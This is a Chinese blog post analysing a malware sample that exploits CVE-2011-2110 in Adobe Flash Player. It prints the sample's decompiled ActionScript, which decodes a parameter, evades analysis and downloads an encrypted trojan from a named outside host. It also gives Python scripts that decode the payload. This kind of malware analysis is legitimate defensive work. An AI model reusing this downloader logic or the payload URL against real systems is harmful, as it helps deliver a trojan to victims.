CVE-2011-2110 Adobe Flash Player 数组越界索引漏洞

实验环境

windows 7
ida
JPEXS Free Flash Decompiler
Adobe Flash Player 10.3.181.22

样本分析

软件下载:http://fpdownload.macromedia.com/get/flashplayer/installers/archive/fp_10.3.181.22_archive.zip

国内下载建议翻墙,国内被2144.com代理了

安装限制解决

修改注册表就好,(假如安装10.3.xxx,10也要删掉)

打开样本,可以看到,样本是加载main.swf,并传递一个info的参数

是根据是否为IE浏览器而设置的,第一处是针对IE,第二三处是针对非IE的(有个叹号嘛)

我们反编译下swf,并搜索info,查看对info参数的操作

这是将info参数转化为二进制后,再每个字节异或122,最后uncompress

1
2
3
4
5
6
7
8
9
10
var param:Object = root.loaderInfo.parameters;
var t_url:ByteArray = this.hexToBin(param["info"]);
i = 0;
i = 0;
while(i < t_url.length)
{
t_url[i] = t_url[i] ^ 122;
i++;
}
t_url.uncompress();

作者用perl,我们用python

1
2
3
4
5
6
7
8
9
10
import binascii
import zlib
hex_string = "02e6b1525353caa8ad555555ad31b637b436aeb1b631b1ad35b355b5a93534ab51d3527b7ab7387656"
binary_string = binascii.unhexlify(hex_string)
# print binary_string
res = ""
for i in binary_string:
res += chr(ord(i) ^ 122)
# print res
print zlib.decompress(res)

解码结果是这个,当然现在肯定访问不了,用作者的

1
http://www.amcia.info/down/cd.txt

这个文件是加密了的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
if(!(browser.toLowerCase().indexOf("msie") > 0 || browser.toLowerCase().indexOf("firefox") > 0))
{
error_arr.uncompress();
}
if(browser.toLowerCase().indexOf("chrome") > 0)
{
error_arr.uncompress();
}
if(Capabilities.isDebugger || Capabilities.supports64BitProcesses || Capabilities.isEmbeddedInAcrobat)
{
error_arr.uncompress();
}
var url_str:String = String(t_url);
loader = new URLLoader();
loader.dataFormat = URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE,onLoadComplete);
loader.load(new URLRequest(t_url.toString()));

给URLLoader的COMPLETE事件加了个onLoadComplete

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
onLoadComplete = function(param1:Event):void
{
content = loader.data;
i = 0;
while(i < content.length)
{
content[i] = content[i] ^ 122;
i++;
}
content.uncompress();
content_len = content.length;
var _loc2_:ByteArray = new ByteArray();
code = _loc2_;
_loc2_.position = 1024 * 1024;
_loc2_.writeInt(2053274210);
_loc2_.writeInt(2053339747);
_loc2_.writeInt(2053405283);
_loc2_.writeObject(_loc2_);
test();
trace(_loc2_.length);
};

python解密

1
2
3
4
5
6
7
8
9
import zlib
fp = open("./cd.txt", "rb")
data = fp.read()
dec = ""
for i in data:
dec += chr(ord(i) ^ 122)
file = zlib.decompress(dec)
fp2 = open("decode.bin", "wb")
fp2.write(file)

结果是一个加了壳的PE程序

金山火眼好像下架了,看看腾讯哈勃

https://habo.qq.com/file/showdetail?pk=AD0GZ11tB2YIMVs5

virustotal的

https://www.virustotal.com/#/file/021e3efdd7060cdbcbd066b5be3867de7b5ccc8ecbb8aa0cd2ad2971d9cc36f2/detection

行为挺多的,virustotal的也可以看到是游戏相关的木马

后面的看了下,比较懒。。。。。。,先不搞了

本地搭建服务器复现漏洞不错

将exp改为poc调试也是不错的操作

还有就是查看修补补丁的时候,没有match到函数,可以搜索漏洞的指令对应的16进制

自愿打赏专区